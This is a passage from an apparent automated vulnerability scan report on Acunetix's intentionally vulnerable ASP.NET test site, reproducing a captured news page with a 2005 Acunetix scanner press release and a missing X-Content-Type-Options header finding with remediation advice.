ICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYEHgRUZXh0BRJSZWFkIHVzZXIgY29tbWVudHMeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTJkZAILDxYCHgNzcmNkZGQMFEFD4s6E4+L8NgEI5fU11kxKVg==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKsmpfVDAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/sNcuYAa/cRqMvUgVyEWyccHwUIA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix                            Web Vulnerability Scanner 2 </strong></p>                           <p>21 July 2005 - <strong>Start-up company Acunetix released                            Acunetix Web Vulnerability Scanner: a tool to automatically                            audit website security. Acunetix Web Vulnerability Scanner                            2 crawls an entire website, launches popular web attacks                            (SQL Injection etc.) and identifies vulnerabilities                            that need to be fixed.</strong> </p>                           <p><strong>Securing your website should be your number one                            concern</strong><br />                           Hackers are concentrating their efforts on web-based                            applications - 75% of cyber attacks are done at the                            web application level, a Gartner Group study has revealed.                            Web applications are accessible 24 hours a day, 7 days                            a week and control valuable data such as customer information,                            transaction information and even proprietary corporate                            data.</p>                           <p><strong>500,000 customer credit card numbers obtained via                            a web attack</strong><br />                           Well-known sites that were open to web application attacks                            include fashion label Guess and pet supply retailer                            PetCo.com who were notoriously found to be vulnerable                            to the SQL injection vulnerability (June 2003). This                            resulted in PetCo leaving as many as 500,000 credit                            card numbers open to anyone able to construct this specially-crafted                            URL.</p>                           <p><strong>Firewalls, SSL and locked-down servers are futile                            against web application hacking</strong><br />                           Any defense at network security level will provide no                            protection against web application attacks since they                            are launched on port 80 - which has to remain open.                            In addition, web applications (customer areas, shopping                            carts etc.) are often tailor-made, invariably tested                            less than off-the-shelf software and are therefore more                            susceptible to attack.</p>                           <p>&quot;Companies have implemented network-level security,                            however they fail to audit and secure their web applications.                            These applications have access to sensitive data and                            are a hacker's prime target,&quot; said Nick Galea,                            CEO of Acunetix. &quot;Auditing one's web apps should                            be the number one security concern.&quot;</p>                           <p><strong>The need for an automated web application vulnerability                            scanner</strong><br />                           Manually auditing a web application for vulnerabilities                            to SQL injection, cross site scripting and other web                            attacks is virtually impossible. With Acunetix Web Vulnerability                            Scanner the process of auditing web applications such                            as shopping carts and forms, can be easily automated.                            What's more, the security checks can easily be re-launched                            for each application update.</p>                           <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br />                           Acunetix WVS first crawls the whole website, analyzes                            in-depth each file it finds, and displays the entire                            website structure. After this discovery stage, it performs                            an automatic audit for common security vulnerabilities.</p>                           <p><strong>Automatically detects SQL injection, cross site                            scripting and other web vulnerabilities</strong><br />                           SQL injection is a hacking technique which modifies                            SQL commands in order to gain access to data in the                            database. Cross site scripting attacks allow a hacker                            to execute a malicious script on your visitors' browser.                            Acunetix Web Vulnerability Scanner can check if your                            web application is vulnerable to both of these attacks.                            More information about cross site scripting &amp; SQL                            injection at our website security info page.</p>                           <p><strong>Acunetix Web Vulnerability Scanner also checks for                            the following web attacks:</strong></p>                           <ul> <li>CRLF injection attacks<br />                           </li><li>Code execution attacks<br />                           </li><li>Directory traversal attacks<br />                           </li><li>File inclusion attacks<br />                           </li><li> Input validation attacks<br />                           </li><li>Authentication attacks.</li> </ul>                           <p><strong>Advanced penetration testing tools</strong><br />                           Acunetix WVS also includes tools such as an HTTP editor                            &amp; HTTP sniffer to allow customization of web vulnerability                            checks. Using the Vulnerability editor, new attacks                            can easily be created.</p>                           <p><strong>Pricing &amp; availability</strong><br />                           Acunetix WVS is available as an enterprise or as a consultant                            version. A subscription based license can be purchased                            for as little as $395, whereas a perpetual license starts                            at $2995. For more information visit our pricing page.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        30. POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
          Alert tags
          Alert description

